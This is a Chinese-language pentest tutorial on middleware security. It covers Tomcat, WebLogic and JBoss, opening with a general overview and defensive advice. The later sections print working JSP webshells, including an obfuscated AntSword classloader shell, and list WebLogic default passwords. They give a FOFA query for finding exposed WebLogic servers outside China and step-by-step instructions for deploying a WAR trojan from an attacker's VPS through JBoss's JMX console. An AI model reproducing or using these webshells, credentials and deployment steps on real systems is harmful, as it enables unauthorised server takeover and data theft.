中间件安全 - 技术栈

一.中间件概述

1.中间件定义

介绍：中间件（Middleware）作为一种软件组件，在不同系统、应用程序或服务间扮演着数据与消息传递的关键角色。它常处于应用程序和操作系统之间，就像一座桥梁，负责不同应用程序间的数据传递、通信协调以及网络请求处理

2.中间件的架构与功能

插件式架构：中间件采用插件式架构，这使得开发人员能轻松将其集成到现有的应用程序里，大大提升了开发的灵活性。
多样化功能
- 身份验证与授权：通过身份验证确认用户合法性，再依据授权机制分配不同权限，确保只有合法且权限匹配的用户能访问特定资源。比如企业办公系统，员工凭借用户名和密码登录（身份验证），不同级别员工拥有不同操作权限（授权）。
- 缓存：缓存常用数据，减少对后端数据库等存储的频繁访问，显著提高系统响应速度。如新闻类应用，将热门文章缓存，用户再次浏览时可快速加载。
- 负载均衡：把网络请求均匀分散到多个服务器，避免单个服务器负载过重，保障系统在高并发下的稳定运行。以大型电商平台为例，促销活动期间大量用户访问，负载均衡器将请求合理分配。
- 日志记录：详细记录系统运行中的各类事件，为故障排查、安全审计提供有力依据。如记录服务器上用户的操作行为、登录时间等。
- 安全性保障：提供基础的安全防护，抵御部分常见网络攻击。

3.中间件范畴

广义范畴：从广义视角，中间件涵盖了 Web 服务器、身份验证系统、消息传递工具等众多内容。
具体产品：常见的中间件产品包括 jboss、weblogic、tomcat、apache 等。应用中间件能够有效提升应用程序在可扩展性、可靠性、可维护性以及安全性方面的表现。

二.漏洞剖析

1.漏洞危害

介绍：中间件漏洞指的是中间件软件中存在的安全隐患，攻击者可能利用这些漏洞对系统展开攻击与渗透，从而危及系统安全和数据完整性。

2.漏洞类型

代码注入漏洞：攻击者向中间件发送恶意代码，借此执行任意代码或获取敏感数据。例如，早期一些未严格过滤输入的 Web 应用，攻击者通过在输入框注入代码，获取数据库关键信息。
跨站脚本漏洞（XSS）：攻击者在中间件输出的网页中插入恶意脚本，可窃取用户信息，如会话 Cookie，或进行恶意重定向等行为。一些小型论坛因缺乏对用户输入内容的有效过滤，曾遭受此类攻击。
SQL 注入漏洞：在中间件处理 SQL 查询时，攻击者插入恶意代码，实现执行任意 SQL 查询，获取数据库敏感数据。如某些管理系统，因对用户输入的查询条件未做严格验证，导致数据库被非法访问。
认证和授权漏洞：攻击者利用中间件认证与授权机制的缺陷，绕过访问控制，获取系统高级权限。比如某些系统中，攻击者通过篡改认证令牌获取管理员权限。
文件包含漏洞：攻击者利用中间件的文件包含功能，引入恶意文件并执行其中代码。在一些内容管理系统中，攻击者通过此漏洞上传恶意脚本文件，实现对系统的控制。

3.防御措施

安全编码：开发人员遵循安全编码规范，对用户输入进行严格验证和过滤，从源头防止恶意代码注入。
定期更新：及时安装中间件供应商发布的安全补丁，修复已知漏洞，保持中间件的安全性。
权限管理：合理设置用户权限，遵循最小权限原则，仅赋予用户完成任务所需的最低权限。
防火墙配置：通过配置防火墙，对中间件的网络访问进行精细控制，阻挡外部非法访问。
漏洞扫描：借助专业的漏洞扫描工具，定期对中间件进行全面检测，及时发现并修复潜在漏洞。

三.中间件漏洞

1.Tomcat

A.Tomcat

介绍：Tomcat 是一个开源的 Java Servlet 容器，由 Apache 软件基金会开发。Tomcat 对多种 Java 技术提供支持，包括 Java Servlet、JavaServer Pages（JSP）、Java Expression Language（EL）和 WebSocket 等，并且拥有许多企业级特性，如集群、安全性和可扩展性，这使其在 Java Web 开发中应用广泛。
使用：
- 可作为独立的 Web 服务器或应用服务器运行。
- 也能作为插件集成到其他 Web 服务器，例如 Apache HTTP Server。

B.WAR包

介绍：WAR（Web Application Archive）是 Web 应用程序的一种打包格式，作用是将 Web 应用程序打包成单个文件，极大地方便了应用程序的部署与分发。从本质上讲，WAR 文件属于 JAR（Java Archive）文件的一种，其中包含了 Web 应用程序运行所需的全部内容。
- 代码相关：Java 类文件，是应用程序逻辑实现的核心部分。
- 页面相关：HTML、JSP 文件，用于构建用户界面，展示内容给用户。
- 配置相关：Servlet、XML 配置文件（如 web.xml、context.xml 等），用于配置 Web 应用程序的各种参数和运行规则，决定应用程序如何运行。
- 静态资源：包含图片、CSS、JavaScript 文件等，用于美化界面和实现交互功能。

C.WAR包上传

制作WAR包：将jsp木马文件进行压缩后，将压缩文件 .zip 改为 .war

jsp文件内容：

<%@ page import="java.io.BufferedReader, java.io.InputStreamReader, java.io.IOException" %>
<%
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
    try {
      Process process = Runtime.getRuntime().exec(cmd);
      BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
      String line;
      while ((line = reader.readLine()) != null) {
        out.println(line);  // 输出命令执行结果
      }
      reader.close();  // 关闭资源
    } catch (IOException e) {
      out.println("Error executing command: " + e.getMessage());
    }
  }
%>

找到上传点进行上传
上传成功
调用一句话木马文件，并成功执行命令

2.Weblogic

介绍： WebLogic Server 是美国甲骨文（Oracle）公司开发的一款适用于云环境和传统环境的应用服务中间件，确切的说是一个基于 JavaEE 架构的中间件，它提供了一个现代轻型开发平台，用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
特征：
1. 默认端口：7001
2. Web界面：Error 404--Not Found
3. 控制后台：http://ip:7001/console
历史漏洞
影响版本
- 10.3.6.0
  
  12.1.3.0
  
  12.2.1.1
  
  12.2.1.2
  
  12.2.1.3
  
  14.1.1.0
漏洞寻找
1. 获取资产：shodan、fofa、zoomeye等
  - 示例：fofa：app="BEA-WebLogic-Server" && country!="CN"
2. 批量扫描脚本：Weblogic一键漏洞检测工具_V1.5
漏洞环境搭建
- docker pull vulhub/weblogic:10.3.6.0-2017
  
  docker run -dit -p 7001:7001 vulhub/weblogic:10.3.6.0-2017

A.弱口令

介绍：Weblogic存在管理后台，通过账号密码登录，由于管理员的疏忽，经常会使用弱口令，或者默认的账户名密码。
- 默认账密：
  
  访问路径：/console
  
  账号：weblogic
  
  密码：Oracle@123
Weblogic 默认口令：
- system/password
  
  system/Passw0rd
  
  weblogic/weblogic
  
  admin/security
  
  joe/password
  
  mary/password
  
  system/security
  
  wlcsystem/wlcsystem
  
  wlpisystem/wlpisystem
  - 参考链接：https://cirt.net/passwords?criteria=weblogic

B.GetShell

准备 .jsp 一句话木马文件

  <%@ page import="java.io.BufferedReader, java.io.InputStreamReader, java.io.IOException" %>
  <%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
      try {
        Process process = Runtime.getRuntime().exec(cmd);
        BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
        String line;
        while ((line = reader.readLine()) != null) {
          out.println(line);  // 输出命令执行结果
        }
        reader.close();  // 关闭资源
      } catch (IOException e) {
        out.println("Error executing command: " + e.getMessage());
      }
    }
  %>

登录后台后，点击部署
点击安装
点击上载文件
上传完，并测试

getshell

注意：上面的 .jsp 文件不支持蚁剑，蚁剑连接必须使用下面的 yijian.jsp 或蚁剑插件生成的jsp webshell

  <%@ page import="java.lang.reflect.Method" %>
  <%!
      class U extends ClassLoader {
          U(ClassLoader c) {
              super(c);
          }

          public Class g(byte[] b) {
              return super.defineClass(b, 0, b.length);
          }
      }

      public byte[] base64Decode(String str) throws Exception {
          try {
              Class clazz = Class.forName("sun.misc.BASE64Decoder");
              return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
          } catch (Exception e) {
              Class clazz = Class.forName("java.util.Base64");
              Object decoder = clazz.getMethod("getDecoder").invoke(null);
              return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
          }
      }
  %>

  <%
      String cls = request.getParameter("ant");
      if (cls != null) {
          new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
      }
  %>

3.JBoss漏洞

介绍：JBoss是一个用于管理EJB（Enterprise JavaBeans）的容器和服务器。它专注于企业级Java应用的开发与部署，本身核心服务并不包含支持servlet/JSP的WEB容器，在实际应用中，通常会与Tomcat或Jetty绑定使用，就如同Apache是常见的web服务器，而JBoss则是专门用来运行Java EE程序的应用服务器。
历史漏洞：
1. 访问控制不严导致的漏洞
  - JMX Console 未授权访问 Getshell：Jboss 的 webUI 界面http://ip:port/jmx-console存在未授权访问情况，甚至部分存在默认密码admin/admin。这一漏洞会导致 JBoss 的部署管理信息泄露，攻击者还能借此直接上传木马获取 webshell。
  - Administration Console 弱口令 Getshell：由于用户设置的口令强度不足，攻击者通过简单的猜测或暴力破解，利用弱口令登录 Administration Console，进而获取服务器权限，实现 Getshell。
  - CVE - 2007 - 1036 -- JMX Console HtmlAdaptor Getshell：此漏洞与 JMX Console 的 HtmlAdaptor 相关，攻击者利用该漏洞可以在未授权的情况下获取服务器的控制权，实现 Getshell 操作。
  - CVE - 2010 - 0738 -- JMX 控制台安全验证绕过漏洞：通过特定的手段，攻击者能够绕过 JMX 控制台的安全验证机制，获取对控制台的访问权限，从而进一步实施攻击行为。
2. 反序列化漏洞
  - CVE - 2013 - 4810 -- JBoss EJBInvokerServlet 反序列化漏洞：JBoss 的 EJBInvokerServlet 存在反序列化漏洞，攻击者可以构造恶意的反序列化数据，利用该漏洞执行任意代码，进而控制服务器。
  - CVE - 2015 - 7501 -- JBoss JMXInvokerServlet 反序列化漏洞：在 JMXInvokerServlet 中，由于反序列化机制的缺陷，攻击者可以发送精心构造的请求，触发反序列化漏洞，实现对服务器的攻击。
  - CVE - 2017 - 7504 -- JBoss 4.x JBossMQ JMS 反序列化漏洞：针对 JBoss 4.x 版本的 JBossMQ JMS 组件，存在反序列化漏洞，攻击者可以利用该漏洞进行远程代码执行，对服务器造成严重威胁。
  - CVE - 2017 - 12149 -- JBosS AS 6.X 反序列化漏洞：在 JBosS AS 6.X 版本中，存在反序列化漏洞，攻击者可以通过发送恶意请求，利用该漏洞获取服务器的控制权。
JBoss 漏洞检测工具：一个简单探测jboss漏洞的工具

A.JMX Console 未授权访问漏洞利用

漏洞利用工具
- 自动化利用：使用https://gitee.com/yijingsec/JbossVulExploit进行自动化利用。具体步骤如下：
  - 首先，将文件夹里的bx3.war放到自己的公网服务器上，然后使用 python 启动一个 http 服务，用于提供 war 包的下载。
  - 运行脚本，在脚本中设置Set target url为目标网站，Set vps ip为 war 包所在的 http 服务的 ip，Set vps httpServer port为所启动的 http 服务的端口。完成设置后，即可自动利用漏洞进行攻击，攻击成功后，可使用冰蝎进行连接，获取服务器的控制权。
手动利用
- 远程部署 war 包：
  - 找到jboss.deployment选项（Jboss 自带的部署功能）中的flavor = URL,type = DeploymentScanner点进去（通过 url 的方式远程部署）。也可以直接输入以下 URL 进入：http://xx.xx.xx.xx:8080/jmx-console/HtmlAdaptor?action=inspectMBean\&name=jboss.deployment:type=DeploymentScanner,flavor=URL。
  - 进入页面后找到void addURL()，开始部署远程的 war 包木马。具体操作如下：
    - 打包 jsp 马为 war 包：jar -cvf shell.war shell.jsp
    - 在 vps 上启动 web 服务：python -m http.server
    - 确定 war 包下载地址：http://vps - IP:8000/shell.war
    - 点击Invoke部署 war 包。
  - 随后点击Back to MBean View来到URLList中查看Value值是否已经部署好，并且为远程 war 木马地址。
  - 最后点击Apply Changes后耐心等待一会儿（等待时间较长），然后回到JMX - Console目录中，找到jboss.web.deployment查看是否存在部署的 war 木马。若存在，则表示部署成功，攻击者可以进一步利用该 war 包获取服务器的控制权。